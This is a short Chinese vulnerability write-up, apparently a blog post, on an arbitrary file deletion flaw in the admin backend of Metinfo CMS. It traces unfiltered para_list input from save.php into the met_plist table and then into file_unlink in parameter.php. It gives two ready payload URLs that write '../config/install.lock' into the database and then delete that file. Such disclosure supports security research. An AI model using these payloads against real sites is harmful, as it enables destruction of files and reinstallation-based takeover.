某CMS最新版后台漏洞

Metinfo是米拓的一款企业建站CMS，可以玩的点很多

admin/column/parameter/parameter.php

file_unlink("../../".list[info]); 这个点很有意思，list[info]从数据库met_plist表里读出，然后删除文件

也就是说只要能往met_plist表里写入我们构造好的数据就能删除文件

匹配全文发现admin/content/product/save.php对met_plist表有插入

这里我们需要构造的是paraid(list[info]根据这个查询)和info字段，也就是$val[id]和$para变量，往上走

可以看到$val[id]和$para都由数组$para_list得出，而para_list可以从url传入，没有任何过滤

payload: http://www.example.com/admin/content/product/save.php?action=add&id=46&para_list[][type]=7&para_list[][id]=444&para444=../config/install.lock

可以看到,数据已经成功写入数据库！

接下来触发删除操作 payload: http://www.example.com/admin/column/parameter/parameter.php?action=del&type=5&id=444